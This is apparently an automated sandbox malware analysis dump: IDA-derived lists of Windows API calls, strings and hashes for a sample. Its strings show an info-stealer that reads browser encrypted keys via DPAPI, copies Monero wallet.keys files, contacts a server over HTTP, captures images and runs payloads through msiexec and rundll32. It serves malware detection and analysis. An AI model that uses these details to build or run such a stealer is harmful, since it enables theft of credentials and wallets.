                                                • StrStrA.SHLWAPI(?,008C9C60,00000000,?,00421458,00000000,?,00000000,00000000,?,00899B10,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                • StrStrA.SHLWAPI(00000000,008C9B40), ref: 0040CCB9
                                                  • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                  • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00899AF0), ref: 0040C871
                                                  • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                  • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                • StrStrA.SHLWAPI(?,008C9B40,00000000,?,0042145C,00000000,?,00000000,00899AF0), ref: 0040CD5A
                                                • StrStrA.SHLWAPI(00000000,00899830), ref: 0040CD71
                                                  • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                  • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                  • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                • String ID:
                                                • API String ID: 3555725114-3916222277
                                                • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • RegOpenKeyExA.ADVAPI32(00000000,008C6C20,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                • wsprintfA.USER32 ref: 00418459
                                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                • String ID: - $%s\%s$?
                                                • API String ID: 3246050789-3278919252
                                                • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • memset.MSVCRT ref: 00410C1C
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                • memset.MSVCRT ref: 00410CCD
                                                • memset.MSVCRT ref: 00410CE1
                                                  • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
                                                  • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                • String ID: .exe
                                                • API String ID: 1395395982-4119554291
                                                • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                APIs
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateGlobalStream
                                                • String ID: image/jpeg
                                                • API String ID: 2244384528-3785015651
                                                • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                APIs
                                                • strtok_s.MSVCRT ref: 00411307
                                                • strtok_s.MSVCRT ref: 00411750
                                                  • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
                                                  • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: strtok_s$lstrcpylstrlen
                                                • String ID:
                                                • API String ID: 348468850-0
                                                • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExecuteShell$lstrcpy
                                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                • API String ID: 2507796910-3625054190
                                                • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                APIs
                                                • memset.MSVCRT ref: 00824505
                                                • memset.MSVCRT ref: 0082451C
                                                  • Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072
                                                • lstrcat.KERNEL32(?,00000000), ref: 00824553
                                                • lstrcat.KERNEL32(?,0064A30C), ref: 00824572
                                                • lstrcat.KERNEL32(?,?), ref: 00824586
                                                • lstrcat.KERNEL32(?,0064A5D8), ref: 0082459A
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 00828FF7: GetFileAttributesA.KERNEL32(00000000,?,00811DBB,?,?,00425654,?,?,00420E1F), ref: 00829006
                                                  • Part of subcall function 00819F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 00819FA0
                                                  • Part of subcall function 00819F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 00819FF9
                                                  • Part of subcall function 00819C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00819C53
                                                  • Part of subcall function 00819C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819C78
                                                  • Part of subcall function 00819C27: LocalAlloc.KERNEL32(00000040,?), ref: 00819C98
                                                  • Part of subcall function 00819C27: ReadFile.KERNEL32(000000FF,?,00000000,008116F6,00000000), ref: 00819CC1
                                                  • Part of subcall function 00819C27: LocalFree.KERNEL32(008116F6), ref: 00819CF7
                                                  • Part of subcall function 00819C27: CloseHandle.KERNEL32(000000FF), ref: 00819D01
                                                  • Part of subcall function 00829627: GlobalAlloc.KERNEL32(00000000,00824644,00824644), ref: 0082963A
                                                • StrStrA.SHLWAPI(?,0064A0D8), ref: 0082465A
                                                • GlobalFree.KERNEL32(?), ref: 00824779
                                                  • Part of subcall function 00819D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00815155,00000000,00000000), ref: 00819D56
                                                  • Part of subcall function 00819D27: LocalAlloc.KERNEL32(00000040,?,?,?,00815155,00000000,?), ref: 00819D68
                                                  • Part of subcall function 00819D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00815155,00000000,00000000), ref: 00819D91
                                                  • Part of subcall function 00819D27: LocalFree.KERNEL32(?,?,?,?,00815155,00000000,?), ref: 00819DA6
                                                  • Part of subcall function 0081A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0081A094
                                                • lstrcat.KERNEL32(?,00000000), ref: 0082470A
                                                • StrCmpCA.SHLWAPI(?,004208D1), ref: 00824727
                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00824739
                                                • lstrcat.KERNEL32(00000000,?), ref: 0082474C
                                                • lstrcat.KERNEL32(00000000,00420FB8), ref: 0082475B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                • String ID:
                                                • API String ID: 1191620704-0
                                                • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                • Instruction ID: b8bd1d1c0419b68584dc9ef16ff68d34596ace892940984a9dd0a2706e3ab06b
                                                • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                • Instruction Fuzzy Hash: 9D7130B6900218BBDB14EBE4EC49FEE7779FF49300F008598F605D6181DA759A85CB52
                                                APIs
                                                • memset.MSVCRT ref: 0041429E
                                                • memset.MSVCRT ref: 004142B5
                                                  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                • lstrcatA.KERNEL32(?,008C94C0), ref: 0041430B
                                                • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                • lstrcatA.KERNEL32(?,008C8FC8), ref: 00414333
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                  • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                  • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                  • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                  • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                  • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                  • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                  • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                  • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                • StrStrA.SHLWAPI(?,008C95B0), ref: 004143F3
                                                • GlobalFree.KERNEL32(?), ref: 00414512
                                                  • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                  • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                  • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                  • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                  • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                • String ID:
                                                • API String ID: 1191620704-0
                                                • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                APIs
                                                • memset.MSVCRT ref: 00401327
                                                  • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                  • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                  • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                  • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                  • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                • lstrlenA.KERNEL32(?), ref: 0040135C
                                                • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                  • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                  • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                  • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                  • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                  • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                • memset.MSVCRT ref: 00401516
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                • API String ID: 1930502592-218353709
                                                • Opcode ID: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
                                                • Instruction ID: 456b5fac361f61c5265e43a16bd15ab14158e39c7f71a6669150f14a30e0c61c
                                                • Opcode Fuzzy Hash: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
                                                • Instruction Fuzzy Hash: 565164B1D5011897CB15FB61DD91BED733CAF54304F4041ADB60A62092EE385BD9CBAA
                                                APIs
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                  • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00406303
                                                  • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                  • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,008CA638,00000000,00000000,00400100,00000000), ref: 00406385
                                                  • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                  • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                  • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                • API String ID: 3532888709-1526165396
                                                • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                APIs
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
